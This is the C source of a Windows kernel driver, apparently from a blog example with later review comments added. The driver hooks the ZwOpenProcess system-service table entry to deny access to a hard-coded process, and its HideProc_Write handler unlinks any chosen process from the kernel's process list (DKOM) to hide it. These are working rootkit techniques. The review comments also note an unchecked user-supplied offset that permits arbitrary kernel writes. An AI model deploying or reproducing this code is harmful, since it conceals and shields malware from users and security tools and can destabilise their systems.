  1. /*ZwOpenProcess hook example to return STATUS_ACCESS_DENIED
  2. http://unlmtd.wordpress.com/*/
  3.  
  4. #include "ntddk.h"
  5. #include "ntifs.h"
  6.  
  7.  
  8.  
  9. /* The kernel's Service Descriptor Table*/
  10. //.....................................................
  11.  
/*
 * Mirror of the kernel's KeServiceDescriptorTable entry (the SSDT).
 * ServiceTableBase is the array of system-service addresses that the
 * HOOK/UNHOOK macros below overwrite; NumberOfServices bounds that array.
 * NOTE(review): 4-byte table entries are assumed here and in DriverEntry
 * (NumberOfServices*4), which only describes 32-bit kernels — confirm the
 * intended target platform.
 */
typedef struct ServiceDescriptorEntry {
        unsigned int *ServiceTableBase;
        unsigned int *ServiceCounterTableBase; /*Used only in checked build*/
        unsigned int NumberOfServices;
        unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;


/* Imported directly from the kernel image; the driver does not locate it itself. */
__declspec(dllimport)  ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

/*Very useful macros*/

typedef unsigned int UINT;
typedef int BOOL;

/* Request record written to the device by user mode (consumed in HideProc_Write):
 *   uPid         - id of the process to unlink
 *   uFlinkOffset - caller-supplied byte offset into EPROCESS where the list
 *                  entry is expected; it is added to a kernel pointer unchecked. */
typedef struct _hpstruct{
    UINT uPid;
    UINT uFlinkOffset;
}hpstruct;

/* Current SSDT entry for a Zw* stub: the ULONG at byte offset 1 of the stub
 * is read as the service index (presumably the x86 stub encoding — verify). */
#define SYSTEMSERVICE(_function)  KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]

typedef DWORD (ULONG);
PMDL  g_pmdlSystemCall;       /* MDL over the SSDT; built in DriverEntry, freed in OnUnload */
PVOID *MappedSystemCallTable; /* writable mapping of the SSDT obtained through that MDL */

/* Same index extraction as SYSTEMSERVICE, without the table lookup. */
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)

/* Atomically store _Hook into the slot for _Function and keep the previous value in _Orig. */
#define HOOK_SYSCALL(_Function, _Hook, _Orig )  \
    _Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)

/* NOTE(review): despite the parameter names this stores _Hook and ignores _Orig;
 * OnUnload passes the saved original pointer as _Hook, so the restore is
 * correct only by that calling convention. */
#define UNHOOK_SYSCALL(_Function, _Hook, _Orig )  \
    InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
  45.  
  46. /*Origianl prototype*/
  47.  
  48. //////////////////////////.................................
/* Prototype of the original system service as exported by the kernel. */
NTSYSAPI
NTSTATUS
NTAPI ZwOpenProcess (
                     OUT PHANDLE ProcessHandle,
                     IN ACCESS_MASK DesiredAccess,
                     IN POBJECT_ATTRIBUTES ObjectAttributes,
                     IN PCLIENT_ID ClientId OPTIONAL);


/* Function-pointer type with the ZwOpenProcess signature, used to call the saved original. */

typedef NTSTATUS (*ZWOPENPROCESS)(
                                  OUT PHANDLE ProcessHandle,
                                  IN ACCESS_MASK DesiredAccess,
                                  IN POBJECT_ATTRIBUTES ObjectAttributes,
                                  IN PCLIENT_ID ClientId OPTIONAL);

/* SSDT entry for ZwOpenProcess as found at load time (saved in DriverEntry,
 * written back in OnUnload); NewZwOpenProcess forwards through it. */

ZWOPENPROCESS        OldZwOpenProcess;
  69.  
  70.  
  71. /*Our function*/
  72.  
/*
 * Replacement SSDT entry for ZwOpenProcess.
 * Reads ClientId->UniqueProcess under SEH (ClientId is OPTIONAL and may be an
 * invalid or user-mode pointer); a faulting read returns STATUS_INVALID_PARAMETER.
 * A request naming the hard-coded PID 2816 returns STATUS_ACCESS_DENIED; every
 * other request is forwarded unchanged to the saved original.
 * NOTE(review): the PID is a compile-time constant, so the check only matches a
 * process that happens to receive id 2816 on this boot.
 * NOTE(review): ClientId is not validated with ProbeForRead; the __try block is
 * the only guard against a bad user pointer.
 */
NTSTATUS NewZwOpenProcess(
                          OUT PHANDLE ProcessHandle,
                          IN ACCESS_MASK DesiredAccess,
                          IN POBJECT_ATTRIBUTES ObjectAttributes,
                          IN PCLIENT_ID ClientId OPTIONAL)
{
    HANDLE ProcessId;
    __try /*we do this to avoid crashes*/
    {

        ProcessId = ClientId->UniqueProcess;

    }
    __except(EXCEPTION_EXECUTE_HANDLER) /*a faulting ClientId read ends the call here*/
    {

        /*DbgPrint("Exception");*/
        return STATUS_INVALID_PARAMETER;

    }

    if (ProcessId == (HANDLE)2816) /*Check if the PID matches our protected process PID*/
    {
        return STATUS_ACCESS_DENIED; /*What we want, access denied.*/
    }

    else
        /*Important, if you don't do this your system will hang and crash/BSOD*/
        return OldZwOpenProcess(ProcessHandle, DesiredAccess,ObjectAttributes, ClientId);
}
  103.  
  104.  
  105. /*Unloading routine*/
  106.  
/*
 * Unload routine installed by DriverEntry. It replaces HideProc_Unload, so the
 * device object and symbolic link created in DriverEntry are not torn down here.
 * Writes the saved original pointer back into the ZwOpenProcess SSDT slot, then
 * releases the mapping and the MDL built in DriverEntry.
 */
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
    DbgPrint("_Process Protector Unloading_\n");

    /* Restore the original entry: the macro stores its second argument in the slot. */
    UNHOOK_SYSCALL( ZwOpenProcess, OldZwOpenProcess, NewZwOpenProcess );

    /* Unlock and Free MDL (both were obtained in DriverEntry) */
    if(g_pmdlSystemCall)
    {
        MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
        IoFreeMdl(g_pmdlSystemCall);
    }
}
  121.  
/* Entry point and dispatch routines for the \Device\HideProc control device (defined below). */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath);
NTSTATUS HideProc_Create(PDEVICE_OBJECT DeviceObject, PIRP Irp);
NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp);
NTSTATUS HideProc_Close(PDEVICE_OBJECT DeviceObject, PIRP Irp);
VOID HideProc_Unload(PDRIVER_OBJECT  DriverObject);
NTSTATUS HideProc_Unsupported(PDEVICE_OBJECT DeviceObject, PIRP Irp);
/* Section placement: DriverEntry is discardable after load, the dispatch
 * routines are pageable. NOTE(review): HideProc_Unload is placed in PAGE, but
 * DriverEntry ends up installing OnUnload as the unload routine instead. */
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, HideProc_Create)
#pragma alloc_text(PAGE, HideProc_Write)
#pragma alloc_text(PAGE, HideProc_Close)
#pragma alloc_text(PAGE, HideProc_Unload)
#pragma alloc_text(PAGE, HideProc_Unsupported)
  134.  
  135.  
  136.  
  137.  
  138.  
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
/*
 * Driver entry point.
 *  1. Creates the \Device\HideProc control device, installs the HideProc_*
 *     dispatch routines and exposes the device as \DosDevices\HideProc.
 *  2. Saves the current ZwOpenProcess SSDT entry, maps the SSDT through an MDL
 *     flagged MDL_MAPPED_TO_SYSTEM_VA so the table can be written, and swaps
 *     NewZwOpenProcess into the slot.
 * Returns the IoCreateDevice status (STATUS_UNSUCCESSFUL if MmCreateMdl fails).
 * NOTE(review): if IoCreateDevice fails the code still falls through to the
 * hook installation and then returns the failure status; the image is then
 * unloaded without DriverUnload running, leaving the SSDT slot pointing at
 * unloaded code (a system crash on the next ZwOpenProcess call).
 * NOTE(review): DriverUnload is set to HideProc_Unload and immediately
 * overwritten with OnUnload, so the device object and symbolic link are never
 * deleted on unload.
 * NOTE(review): IoCreateSymbolicLink's return value is ignored.
 * NOTE(review): the MDL length NumberOfServices*4 assumes 4-byte table entries.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath){
    UNICODE_STRING usDriverName, usDosDeviceName;
    PDEVICE_OBJECT pDeviceObject;
    NTSTATUS ntStatus;
    UINT uiIndex;

    DbgPrint("HideProc DriverEntry Called\n");

    RtlInitUnicodeString(&usDriverName, L"\\Device\\HideProc");
    RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\HideProc");

    ntStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);
    if(NT_SUCCESS(ntStatus)){
        /* Every major function rejects by default; only create/write/close are served. */
        for(uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++)
            pDriverObject->MajorFunction[uiIndex]    = HideProc_Unsupported;
        pDriverObject->MajorFunction[IRP_MJ_CREATE]    = HideProc_Create;
        pDriverObject->MajorFunction[IRP_MJ_WRITE]    = HideProc_Write;
        pDriverObject->MajorFunction[IRP_MJ_CLOSE]    = HideProc_Close;
        pDriverObject->DriverUnload            = HideProc_Unload;
        /* Direct I/O: HideProc_Write reads the caller's buffer via Irp->MdlAddress. */
        pDeviceObject->Flags |= DO_DIRECT_IO;
        pDeviceObject->Flags &= (~DO_DEVICE_INITIALIZING);
        IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);
    }



///////////////////
    /* Register a dispatch function for Unload (this replaces HideProc_Unload set above) */
    pDriverObject->DriverUnload  = OnUnload;


    /* save old system call locations*/
    DbgPrint("_Process Protector Called_");
    OldZwOpenProcess =(ZWOPENPROCESS)(SYSTEMSERVICE(ZwOpenProcess));

    /* Map the memory into our domain so we can change the permissions on the MDL*/
    g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
    if(!g_pmdlSystemCall)
        return STATUS_UNSUCCESSFUL;

    MmBuildMdlForNonPagedPool(g_pmdlSystemCall);

    /* Change the flags of the MDL so the following MmMapLockedPages yields a writable view */
    g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;

    MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);

    /* hook system calls*/
    DbgPrint("_Hooking ZwOpenProcess_");
    HOOK_SYSCALL( ZwOpenProcess, NewZwOpenProcess, OldZwOpenProcess );
    return ntStatus;
}
  204.  
/* IRP_MJ_CREATE dispatch routine: logs the open and reports success. */
NTSTATUS HideProc_Create(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    DbgPrint("HideProc_Create Called\n");
    return STATUS_SUCCESS;
}
  210.  
/*
 * IRP_MJ_WRITE dispatch routine. Reads one hpstruct from the caller's buffer
 * (direct I/O, so it arrives through Irp->MdlAddress) and unlinks the EPROCESS
 * of hps->uPid from the doubly-linked list located hps->uFlinkOffset bytes into
 * the EPROCESS, so the process no longer appears in list-based enumeration.
 * Status:
 *   STATUS_INVALID_PARAMETER - no stack location/MDL, the MDL could not be
 *                              mapped, or PsLookupProcessByProcessId failed
 *   STATUS_BUFFER_TOO_SMALL  - write length != sizeof(hpstruct)
 *   STATUS_SUCCESS           - otherwise, including after a caught exception
 * IoStatus.Information is sizeof(hpstruct) whenever the buffer was mapped.
 * NOTE(review): uFlinkOffset comes from user mode and is added to a kernel
 * pointer with no bound check, so any caller that can open the device can aim
 * these writes at arbitrary kernel addresses; the __try only masks faults.
 * NOTE(review): the EPROCESS reference returned by PsLookupProcessByProcessId
 * is never released with ObDereferenceObject (object leak).
 * NOTE(review): NtStatus is overwritten with STATUS_SUCCESS after the __except
 * block, so the exception code logged there is not reported to the caller.
 * NOTE(review): the ULONG casts and ULONG* arithmetic on pEProc and the list
 * pointers assume 32-bit pointers.
 */
NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp){
    NTSTATUS NtStatus = STATUS_INVALID_PARAMETER;
    PIO_STACK_LOCATION pIoStackIrp = NULL;
    UINT dwDataWritten = 0;
    ULONG dwEProcAddr;
    PLIST_ENTRY pListProcs;
    PEPROCESS pEProc;

    hpstruct *hps;

    DbgPrint("HideProc_Write Called\n");
    pIoStackIrp = IoGetCurrentIrpStackLocation(Irp);

    if(pIoStackIrp && Irp->MdlAddress){
        hps = (hpstruct *)MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
        if(hps){
            if(pIoStackIrp->Parameters.Write.Length == sizeof(hpstruct)){
                if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){
                    DbgPrint("EPROCESS found. Address: %08lX.\n", pEProc);
                    DbgPrint("Now hiding process %d...\n", hps->uPid);
                    dwEProcAddr = (ULONG) pEProc;
                    __try{
                        /* caller-supplied offset applied to the EPROCESS address, unvalidated */
                        pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset);
                        *((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink);   //set flink of prev proc to flink of cur proc
                        *((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc
                        pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves
                        pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process
                        DbgPrint("Process now hidden.\n");
                    }__except(EXCEPTION_EXECUTE_HANDLER){
                        NtStatus = GetExceptionCode();
                        DbgPrint("Exception: %d.\n", NtStatus);
                    }
                    /* clobbers the exception status assigned above */
                    NtStatus = STATUS_SUCCESS;
                }
            }else{
                NtStatus = STATUS_BUFFER_TOO_SMALL;
            }
            dwDataWritten = sizeof(hpstruct);
        }
    }

    Irp->IoStatus.Status = NtStatus;
    Irp->IoStatus.Information = dwDataWritten;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return NtStatus;
}
  257.  
/* IRP_MJ_CLOSE dispatch routine: logs the close and reports success. */
NTSTATUS HideProc_Close(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    DbgPrint("HideProc_Close Called\n");
    return STATUS_SUCCESS;
}
  263.  
/* Removes the \DosDevices\HideProc link and the device object created in DriverEntry. */
VOID HideProc_Unload(PDRIVER_OBJECT  DriverObject)
{
    UNICODE_STRING dosLinkName;

    DbgPrint("HideProc_Unload Called\n");

    RtlInitUnicodeString(&dosLinkName, L"\\DosDevices\\HideProc");
    IoDeleteSymbolicLink(&dosLinkName);

    /* the device hangs off the driver object; no separate handle is kept */
    IoDeleteDevice(DriverObject->DeviceObject);
}
  271.  
/* Default dispatch routine for every major function not handled explicitly. */
NTSTATUS HideProc_Unsupported(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    DbgPrint("HideProc_Unsupported Called\n");
    return STATUS_NOT_SUPPORTED;
}